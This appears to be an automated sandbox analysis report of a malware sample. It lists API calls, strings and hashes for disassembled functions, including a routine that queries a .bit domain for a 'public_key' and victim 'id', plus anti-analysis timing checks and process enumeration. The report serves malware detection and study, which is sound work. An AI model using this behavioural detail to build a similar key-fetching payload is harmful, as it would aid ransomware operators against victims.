                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 004E1920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 004E1983
                                                                                                                            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 004E1994
                                                                                                                            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004E19A1
                                                                                                                            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004E19AE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004E19E8
                                                                                                                            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004E19FB
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1AC5
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004E1ADB
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 004E1AEE
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004E1B01
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1C15
                                                                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004E1C36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 004E1C50
                                                                                                                            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 004E1C63
                                                                                                                            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 004E1C76
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1D45
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004E1D73
                                                                                                                            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 004E1D86
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32First), ref: 004E1D99
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 004E1DAC
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 004E1DBF
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 004E1DD2
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32First), ref: 004E1DE5
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32Next), ref: 004E1DF8
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32First), ref: 004E1E0B
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 004E1E1E
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32First), ref: 004E1E31
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32Next), ref: 004E1E44
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1F03
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1FF1
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2066
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2095
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E20FB
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2118
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2187
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E21A4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                            • API String ID: 842291066-1723836103
                                                                                                                            • Opcode ID: d57492a4036af6f0739f0679749cacee9b14a59b6f35e826d4760d5acbfa8a9f
                                                                                                                            • Instruction ID: cbd03a992584a4f3ec5e08c4616c2292859e86f30c5eface954cf06a3af9bf4d
                                                                                                                            • Opcode Fuzzy Hash: d57492a4036af6f0739f0679749cacee9b14a59b6f35e826d4760d5acbfa8a9f
                                                                                                                            • Instruction Fuzzy Hash: 8A3282B0E402699ADB209F65CC45B9FBA79FF45705F0041EBA60CE3291EB748E84CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,?,0052B3EC,000000FF), ref: 0047E6C0
                                                                                                                              • Part of subcall function 0046C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0046C6C2
                                                                                                                              • Part of subcall function 0046C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                              • Part of subcall function 0046C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EC3E
                                                                                                                            • lstrlenA.KERNEL32(","id":"), ref: 0047EC51
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC6D
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC7F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EC93
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047ECB3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED2A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047ED4B
                                                                                                                            • _malloc.LIBCMT ref: 0047ED55
                                                                                                                            • _memset.LIBCMT ref: 0047ED63
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0047ED7D
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED85
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDA3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDAE
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EDD3
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EDF7
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EE05
                                                                                                                            • _free.LIBCMT ref: 0047EE15
                                                                                                                            • _free.LIBCMT ref: 0047EE22
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EF61
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EFBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                            • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 704684250-3586605218
                                                                                                                            • Opcode ID: 1b194b10bc7426e901c2b3e367cfa377b3e123586321635ed2134b25d36542fc
                                                                                                                            • Instruction ID: 6f11c0338a18957c166e7607d9db9ca5d7d4876b38839decbc162d0932cf860f
                                                                                                                            • Opcode Fuzzy Hash: 1b194b10bc7426e901c2b3e367cfa377b3e123586321635ed2134b25d36542fc
                                                                                                                            • Instruction Fuzzy Hash: 0542F471508341ABDB20EF25CC49BDF7BE8BF59308F00495EF48997292DB789509CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046DD40 Relevance: 46.2, APIs: 22, Strings: 4, Instructions: 735stringnetworkmemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcsstr.LIBCMT ref: 0046DD8D
                                                                                                                            • _wcsstr.LIBCMT ref: 0046DDB6
                                                                                                                            • _memset.LIBCMT ref: 0046DDE4
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0046DE0A
                                                                                                                            • gethostbyname.WS2_32(00560134), ref: 0046DEA7
                                                                                                                            • inet_ntoa.WS2_32(?), ref: 0046DEC7
                                                                                                                              • Part of subcall function 004AF26C: std::exception::exception.LIBCMT ref: 004AF27F
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF294
                                                                                                                              • Part of subcall function 004AF26C: std::exception::exception.LIBCMT ref: 004AF2AD
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF2C2
                                                                                                                              • Part of subcall function 004AF26C: std::regex_error::regex_error.LIBCPMT ref: 004AF2D4
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF2E2
                                                                                                                              • Part of subcall function 004AF26C: std::exception::exception.LIBCMT ref: 004AF2FB
                                                                                                                              • Part of subcall function 004AF26C: __CxxThrowException@8.LIBCMT ref: 004AF310
                                                                                                                            • _memmove.LIBCMT ref: 0046DF8C
                                                                                                                            • _memmove.LIBCMT ref: 0046DFFC
                                                                                                                            • _wcsstr.LIBCMT ref: 0046E06C
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008), ref: 0046E07E
                                                                                                                            • inet_addr.WS2_32(?), ref: 0046E0C1
                                                                                                                            • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 0046E0E5
                                                                                                                            • inet_ntoa.WS2_32(?), ref: 0046E103
                                                                                                                            • _memmove.LIBCMT ref: 0046E33B
                                                                                                                            • _memmove.LIBCMT ref: 0046E40F
                                                                                                                            • LocalFree.KERNEL32(?), ref: 0046E495
                                                                                                                            • DnsFree.DNSAPI(?,00000001), ref: 0046E4A0
                                                                                                                            • _memset.LIBCMT ref: 0046E4BC
                                                                                                                            • lstrcpyW.KERNEL32(?,http://), ref: 0046E4D0
                                                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 0046E523
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0046E549
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0046E56A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                                            • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                                            • API String ID: 2428799424-3687932381
                                                                                                                            • Opcode ID: d9c6f6a286454c5cfc929def282d9f8d885f4f5217111257acb8c6d728378760
                                                                                                                            • Instruction ID: eed2ebd804f1a5c8de9b0eae4a34e40aff6987ca52d19b81323feb392217cad8
                                                                                                                            • Opcode Fuzzy Hash: d9c6f6a286454c5cfc929def282d9f8d885f4f5217111257acb8c6d728378760
                                                                                                                            • Instruction Fuzzy Hash: 1052FF74E002099FCF24DF69C8947AEBBF1BF05304F14856EE806AB342E7799945CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00471010
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471026
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047103B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471051
                                                                                                                            • lstrlenA.KERNEL32(?,00000000), ref: 00471059
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00471064
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0047107A
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00471099
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710AB
                                                                                                                            • _memset.LIBCMT ref: 004710CA
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004710DE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710F0
                                                                                                                            • _malloc.LIBCMT ref: 00471100
                                                                                                                            • _memset.LIBCMT ref: 0047110B
                                                                                                                            • _sprintf.LIBCMT ref: 0047112E
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0047113C
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00471154
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0047115F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 2451520719-213608013
                                                                                                                            • Opcode ID: 8509c27c86220cb8a09026b78f004f8ad8aeb4ca66a643d1e4ad00873516d1bd
                                                                                                                            • Instruction ID: ed9111a454036d3bae026f39e1e3ec94eefc035da51b3ddd21e59bd1e15e8b86
                                                                                                                            • Opcode Fuzzy Hash: 8509c27c86220cb8a09026b78f004f8ad8aeb4ca66a643d1e4ad00873516d1bd
                                                                                                                            • Instruction Fuzzy Hash: 8751A171D40219ABDF20EBA4DC46FEFBBB8FF15704F100026FA05B6291D7795A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 00471915
                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00471932
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471941
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471948
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00471956
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00471962
                                                                                                                            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00471974
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 0047198B
                                                                                                                            • lstrcatW.KERNEL32(00000000,00560260), ref: 00471993
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00471999
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004719A3
                                                                                                                            • _memset.LIBCMT ref: 004719B8
                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004719DC
                                                                                                                              • Part of subcall function 00472BA0: lstrlenW.KERNEL32(?), ref: 00472BC9
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471A01
                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00471A04
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                            • String ID: failed with error
                                                                                                                            • API String ID: 4182478520-946485432
                                                                                                                            • Opcode ID: 594a6f484f40eec24f17f996e7afd49bfb4a994c04128af7cd9d290eeefa6c00
                                                                                                                            • Instruction ID: c3d05608617cfb244bf91d4584eea3445703bce539c14a0e9f44951c10bbaee4
                                                                                                                            • Opcode Fuzzy Hash: 594a6f484f40eec24f17f996e7afd49bfb4a994c04128af7cd9d290eeefa6c00
                                                                                                                            • Instruction Fuzzy Hash: A6212B71640214B7D7206B618C4AFAE3E78EF56B10F104055FB05B2191CE741E46EBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471ACA
                                                                                                                              • Part of subcall function 00471AB0: DispatchMessageW.USER32(?), ref: 00471AE0
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0046F900
                                                                                                                            • _memmove.LIBCMT ref: 0046F9EA
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0046FA51
                                                                                                                            • _memmove.LIBCMT ref: 0046FADA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: 624cdf5986b5d41308635619ea6854be2ecbe93387198a121f52b3649f33546a
                                                                                                                            • Instruction ID: dac4e0bd32de0cfc4598dfd4c0ef62a9dbca906edc8011c5c7cb04596156aa80
                                                                                                                            • Opcode Fuzzy Hash: 624cdf5986b5d41308635619ea6854be2ecbe93387198a121f52b3649f33546a
                                                                                                                            • Instruction Fuzzy Hash: 6652D170D00208DBCF10DFA8D985BDEB7F4BF05308F10856EE459A7251E779AA49CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000,00000000), ref: 0046E8CE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E8E4
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046E8F9
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E90F
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0046E928
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E93E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0046E95D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E96F
                                                                                                                            • _memset.LIBCMT ref: 0046E98E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046E9A2
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E9B4
                                                                                                                            • _sprintf.LIBCMT ref: 0046E9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
